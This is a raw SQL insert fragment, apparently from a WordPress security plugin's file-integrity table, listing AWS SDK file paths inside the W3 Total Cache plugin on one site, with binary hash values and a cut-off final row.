\0N~_\'!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/GetBucketLocationParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/GetBucketLocationParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' }I32xNy','PrCz`L%Pۿ[i','',0,'?'),('??Z/!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartCopy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartCopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r.EJ$\0Alz','\r zYԠqY}qY܆wJQ`w%','',0,'?'),('贍Qg顗Inz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ǙmRv7\'','⃔4Y~I\0JV{:PTw|','',0,'?'),('g* ;+z?͠','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploadingTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploadingTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dDeL}','\"I8q\0z\"a','',0,'?'),('UJϘγj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectCopier.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectCopier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2/ssk8a','&[V+Qh ~i-ő\\l^ i,%','',0,'?'),('\"MZnj;+m$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectUploader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectUploader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2NJ:#\"It','\n%3mpC;WQyut\ni 6Aͯ','',0,'?'),('e?8 %\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PermanentRedirectMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PermanentRedirectMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X#\n2z4(߫(','W= d6r̳8 jn}','',0,'?'),(' ̂w8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObject.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObject.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?{ÄEz','r1w-JI=yQ݃W-Ǥ9','',0,'?'),('$[R2:m}W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObjectV4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObjectV4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\"@/&A6','H>~٠YܙzMA@bT|ڥD.P','',0,'?'),('Ow%I`sy\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PutObjectUrlMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PutObjectUrlMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֩[M@w','Rv<\", +>1R2&(6u','',0,'?'),('D(im(N!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Configuration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rkj]a[','dU7)fu߯JMwaT','',0,'?'),('כqV}ԋW=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%kc!','H\'Ρ\n+Wtq˿bw\"x\'+','',0,'?'),('^C]]~d#U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VH#M','idlHS276k$_X','',0,'?'),('YNg[s|\'>X','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r޽JZ\0^t','8XĢ=D+zHieʢxvF7','',0,'?'),('$ŏA_n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RetryableMalformedResponseParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RetryableMalformedResponseParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wg@ˈ','@-gϡ]r e4͝t^5|o+','',0,'?'),('{8!?]Vw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0PW+11M','N4%4{+FmBL.mZ8i2U*','',0,'?'),('4TWS','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʒOBdN\nɉ','mT+7h>vS|Fɿd ,N','',0,'?'),('{x`kd{蠁','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qU +\Z\02x','J϶qgӚWNzmC\n\\d','',0,'?'),('S_YS^HUF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3EndpointMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3EndpointMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p2}wa=x','SCMbjjwOČ[G$:nO','',0,'?'),(' K:hEHw_=5=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3MultiRegionClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3MultiRegionClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$lϋ5','1S\Z:8\\X:i\Z,','',0,'?'),('(t(][y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3UriParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3UriParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d;лԽ+M+','\rq=? 5}gfXlcܧ','',0,'?'),('#w-6ڝʫK','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/SSECMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/SSECMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G:5n:\0,ӵ|','Yx\r!)V\r@kqi&;U!','',0,'?'),('3bZ>f','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/StreamWrapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/StreamWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iSq!p','w]M0`H Ӓ@J','',0,'?'),('ԫ$qdc|Έ9','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Transfer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Transfer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7SzJ2V>nε','{+xK\r/S{M,r\nSI','',0,'?'),('s N#5Z\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Configuration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\\wmWY\"Y','\r,gg\ZߍRQw;Btp k\Z','',0,'?'),('Tp\rb','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+4p)`N\n','Y[}B8HKRU]r[~','',0,'?'),('|I\Z8T, ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Gh^m','vRcĐ ^0722 J\n','',0,'?'),('j$aiR!~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2x%-xjO','kXa9WSroP|b`mf','',0,'?'),('9g ^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/EndpointArnMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/EndpointArnMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Vӧ`b%\Zt(','PCYb3eF:-3@|cK','',0,'?'),('4osr[LG\0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/Exception/S3ControlException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/Exception/S3ControlException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uB{t`RRFc5','|\rXT\nԞ5yL;_','',0,'?'),('W2&\"HIgyl','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N(q!ǻX.= ','6iX>ʼU<RI2V','',0,'?'),('MKE\0oZ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlEndpointMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlEndpointMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\"ybAE*',':@o\'\'<6ƲLjq?e4uZzA','',0,'?'),('~aKR4g','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/Exception/S3OutpostsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/Exception/S3OutpostsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊Zѣ: ','C>AV`^M.怂\\=y3HHnAb','',0,'?'),('N;E5m ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/S3OutpostsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/S3OutpostsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<|aKB|du','A :*?+;f!S|ZPç5','',0,'?'),('d{bi~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/Exception/SSMContactsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/Exception/SSMContactsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d%wûۧP','FK4ٿ\ZR /+&|o','',0,'?'),('07IQxN','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/SSMContactsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/SSMContactsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʖeQwMQ\n\'h|','&׫@r_%ޠ-ݦϣ','',0,'?'),(', V!Ӡ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/Exception/SSMIncidentsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/Exception/SSMIncidentsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cS!g\rE','O^B5wb]xLL+RJS(j(','',0,'?'),('u,T튁u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/SSMIncidentsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/SSMIncidentsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}T{vlKn\\tE4Y','Fg7Qllth꙳(','',0,'?'),('l -k[i ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/Exception/SSOException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/Exception/SSOException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!VKj\n','?\' FÇ. dxf NA}','',0,'?'),('S.1I','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/SSOClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/SSOClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H nə\Z p/N4S','qt%\re@G_w\'GV','',0,'?'),('^f(q{r3v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/Exception/SSOAdminException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/Exception/SSOAdminException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SEץ xRJ','JφTA$2+]%p* <聠','',0,'?'),('\\G1MW[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/SSOAdminClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/SSOAdminClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M{ s|?','ވ\n@x{|fc>','',0,'?'),('ubXVlEՋ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/Exception/SSOOIDCException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/Exception/SSOOIDCException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/չJ}','YFw\ZC\06 wّbz-<','',0,'?'),('tˆTYyM@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/SSOOIDCClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/SSOOIDCClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jg]؜@*d','|L^yy|SyMvdއ\0Z7R','',0,'?'),('HJL','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/Exception/SageMakerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/Exception/SageMakerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/Exception/SagemakerEdgeManagerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/Exception/SagemakerEdgeManagerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HfrCL9e $','d1UYbͽ퉅sdC.','',0,'?'),('޽ղW\0hیn','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/SagemakerEdgeManagerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/SagemakerEdgeManagerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 3Af','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/Exception/SavingsPlansException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/Exception/SavingsPlansException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=YTBt :@','kMSOrph\ncX(.[<\n','',0,'?'),('bԎCʱẂ6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/Exception/SchemasException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/Exception/SchemasException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<̱[W?','kĘPӻv\0Ae52`kՌY.:','',0,'?'),('5Mw8x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/SchemasClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/SchemasClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i({Vll','L9 :GDS6 ]{d)i','',0,'?'),('ƶ,ta\nЀ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sdk.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sdk.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Ghmh\\i','7;7U+&މx?9ʩ֐WpgWM ','',0,'?'),('\r*N5#\n7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/Exception/SecretsManagerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/Exception/SecretsManagerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B`fAQƃ',')EczϙY9I?==rW^l','',0,'?'),('~L_r9iT','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/SecretsManagerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/SecretsManagerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','77a@r,tA','7Kkj4 )đ1^mVd\n','',0,'?'),('^1~^\r7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/Exception/SecurityHubException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/Exception/SecurityHubException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@*C=K9','剗&XAG8;D+⿀<','',0,'?'),('}R+^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/SecurityHubClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/SecurityHubClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z[N4i%R.8','IO]N̥rGםD% \\k~7','',0,'?'),('RMY{|T J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/Exception/ServerlessApplicationRepositoryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/Exception/ServerlessApplicationRepositoryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E΅%~ pV/','U*gHX.]\r>>׷ZϠ)6yf','',0,'?'),('֯u\n0yD','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/ServerlessApplicationRepositoryClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/ServerlessApplicationRepositoryClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r3:׾-7-','ڤBFؒeo3tQ8rէQU','',0,'?'),('K(O\\-M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/Exception/ServiceCatalogException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/Exception/ServiceCatalogException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4BFF&rv','?]4Ynhw:{n\0mh ','',0,'?'),('`OF*i','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/ServiceCatalogClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/ServiceCatalogClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ER jAy\"','c!/ K c-e\0r','',0,'?'),('Qmg٤:x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/Exception/ServiceDiscoveryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/Exception/ServiceDiscoveryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zƅ_\n?䭒W{o','KNUB/U3p~v506','',0,'?'),('BvCw\"1S','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/ServiceDiscoveryClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/ServiceDiscoveryClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E9D!Ƽ','t:ySY&xytaΩ','',0,'?'),(' ?¶%A','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/Exception/ServiceQuotasException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/Exception/ServiceQuotasException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QZ[d1ޑ\Z','5GzxÙ|\n','',0,'?'),('r]GVuj!3,;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/ServiceQuotasClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/ServiceQuotasClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#/b\' tR\"_','\0fx P:u}cw=\\1)','',0,'?'),('\"K X|qA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/Exception/SesException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/Exception/SesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(_S(D','xU \Z$\"0GKTUN4S?r','',0,'?'),('g-ra{1r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/SesClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/SesClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0px]G3',',7Է/ !$J1Zc##w\\-U','',0,'?'),('EZt9ȝ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/Exception/SesV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/Exception/SesV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hiQVxVɞv','B k%GsuF׳}ضxQv','',0,'?'),('\n/y;\'d\0 ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/SesV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/SesV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q-@&tIצ ','7\0_I\\ٽt>78NP','',0,'?'),('8\' g426r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/Exception/SfnException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/Exception/SfnException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?4Zȵ','F-:Ukcړ$ˣԇ26#','',0,'?'),('ӈi#?=B','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/SfnClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/SfnClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{b=[$','\n˖ *g',';Rvu%\nG1^b(-5/','',0,'?'),('^{Щٻ`U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/ShieldClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/ShieldClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0H$\r','uyg@P`)ÅY E1uGV7','',0,'?'),('=o8<\'\nrJ_qP','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/AnonymousSignature.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/AnonymousSignature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K8v7wUxVX','J0;v84C\'k','',0,'?'),('z^!S\rk%ix','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/S3SignatureV4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/S3SignatureV4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+n[XЏw\n',';.\0!,69RL\\Li\ru\"','',0,'?'),('0.YXqk%T','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A̡gn#er7','2Pw7#ǒe\Z%YtK','',0,'?'),('X598','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plu